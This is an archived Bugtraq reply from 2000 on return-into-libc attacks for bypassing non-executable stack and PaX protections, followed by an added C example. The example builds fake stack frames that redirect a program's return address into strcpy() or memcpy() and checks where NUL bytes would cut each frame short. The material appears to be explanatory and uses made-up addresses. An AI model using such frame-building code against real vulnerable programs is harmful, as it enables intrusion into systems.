
Bugtraq mailing list archives

Re: Future of buffer overflows ?
From: tseeker () probemail com
Date: Thu, 2 Nov 2000 04:13:53 -0600

> Feed a return address and arguments so the RET "calls" memcpy(),
> and use this memcpy() to move the buffer to some place in memory where
> you can jump later. Then tell memcpy() to return to this new place,

clarifying:
memcpy() needs an argument specifying the number of bytes to
copy. It will contain 0, so you will have problems with putting
it on the stack. strcpy() is a better choice. This technique
was first described (some years ago) in "Defeating Solar
Designer non-executable stack patch" by Nergal.
Check it out; the second method can be used to bypass PaX
protection as well. It additionally deals with the case when
libc is mapped into a region whose address begins with NULL.

> The second option... let's call it "pop&ret"

That is pretty cool.

The Seeker

ProbeMail / http://www.probemail.com
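The frame described above, as an added example that is not part of the post or of Nergal's paper: it lays out the fake i386 cdecl frame that makes a function's RET "call" strcpy() or memcpy(), with the called routine's return address pointing at the copied buffer, and then checks how much of each frame a strcpy()-style overflow would actually deliver to the stack, since that copy stops at the first NUL byte. The libc, destination and buffer addresses, the 200-byte count and the 64-byte distance to the saved return address are assumptions chosen for illustration. The third scenario only detects the NUL-byte problem of a libc mapped at an address beginning with 0x00; it does not implement the method Nergal gives for that case.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the post.  i386 cdecl layout from the 2000-era
 * discussion: after the overwritten saved EIP come the called routine's
 * return address, then its arguments.  Every address and the 64-byte
 * distance to the saved EIP are assumptions chosen for illustration. */

#define DIST_TO_SAVED_EIP 64   /* assumed: bytes from buffer start to saved EIP */
#define MAX_FRAME 128

/* assumed addresses: libc mapped high (no NUL byte in the address), a
 * writable+executable destination, and the overflowed buffer as source */
#define STRCPY_ADDR 0x4007a1b0u
#define MEMCPY_ADDR 0x4007b2c0u
#define LOW_STRCPY  0x0012a1b0u   /* libc mapped at an address beginning with NULL */
#define DST_ADDR    0x08049ef4u
#define SRC_ADDR    0xbffff8a4u

static size_t put32(uint8_t *out, size_t off, uint32_t v)
{
    out[off] = (uint8_t)v;               /* little-endian, as on i386 */
    out[off + 1] = (uint8_t)(v >> 8);
    out[off + 2] = (uint8_t)(v >> 16);
    out[off + 3] = (uint8_t)(v >> 24);
    return off + 4;
}

/* Frame for: RET -> strcpy(dst, src); strcpy's own RET -> dst, the copy. */
size_t build_strcpy_frame(uint8_t *out, uint32_t strcpy_addr, uint32_t dst, uint32_t src)
{
    memset(out, 'A', DIST_TO_SAVED_EIP);                     /* filler up to the saved EIP */
    size_t off = put32(out, DIST_TO_SAVED_EIP, strcpy_addr); /* overwritten saved EIP */
    off = put32(out, off, dst);                              /* where strcpy() returns to */
    off = put32(out, off, dst);                              /* arg 1: destination */
    off = put32(out, off, src);                              /* arg 2: source */
    return off;
}

/* Same frame for memcpy(dst, src, n): one more argument, the byte count. */
size_t build_memcpy_frame(uint8_t *out, uint32_t memcpy_addr, uint32_t dst, uint32_t src, uint32_t n)
{
    memset(out, 'A', DIST_TO_SAVED_EIP);
    size_t off = put32(out, DIST_TO_SAVED_EIP, memcpy_addr);
    off = put32(out, off, dst);
    off = put32(out, off, dst);
    off = put32(out, off, src);
    off = put32(out, off, n);                                /* arg 3: e.g. 200 = 0x000000c8 */
    return off;
}

/* A strcpy()-style overflow stops at the first NUL byte: returns how many
 * bytes of the frame actually reach the stack (len if all of them do). */
size_t copied_length(const uint8_t *frame, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (frame[i] == 0)
            return i;
    return len;
}

/* Three scenarios; each returns the bytes copied and, if built is non-NULL,
 * stores the length of the frame that was laid out. */
size_t strcpy_frame_copied(size_t *built)
{
    uint8_t f[MAX_FRAME];
    size_t n = build_strcpy_frame(f, STRCPY_ADDR, DST_ADDR, SRC_ADDR);
    if (built) *built = n;
    return copied_length(f, n);
}

size_t memcpy_frame_copied(size_t *built)
{
    uint8_t f[MAX_FRAME];
    size_t n = build_memcpy_frame(f, MEMCPY_ADDR, DST_ADDR, SRC_ADDR, 200);
    if (built) *built = n;
    return copied_length(f, n);
}

size_t low_libc_frame_copied(size_t *built)
{
    uint8_t f[MAX_FRAME];
    size_t n = build_strcpy_frame(f, LOW_STRCPY, DST_ADDR, SRC_ADDR);
    if (built) *built = n;
    return copied_length(f, n);
}

int main(void)
{
    size_t built, copied;
    copied = strcpy_frame_copied(&built);
    printf("strcpy frame:   %zu of %zu bytes reach the stack\n", copied, built);
    copied = memcpy_frame_copied(&built);
    printf("memcpy frame:   %zu of %zu bytes reach the stack (NUL in the length)\n", copied, built);
    copied = low_libc_frame_copied(&built);
    printf("libc at 0x00..: %zu of %zu bytes reach the stack (NUL in the address)\n", copied, built);
    return 0;
}
```

The strcpy() frame is delivered whole; the memcpy() frame is cut off one byte into its length argument, so memcpy() would run with garbage for its third parameter, which is the problem the post points out; and a libc address with a leading 0x00 byte truncates the frame inside the overwritten return address itself.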
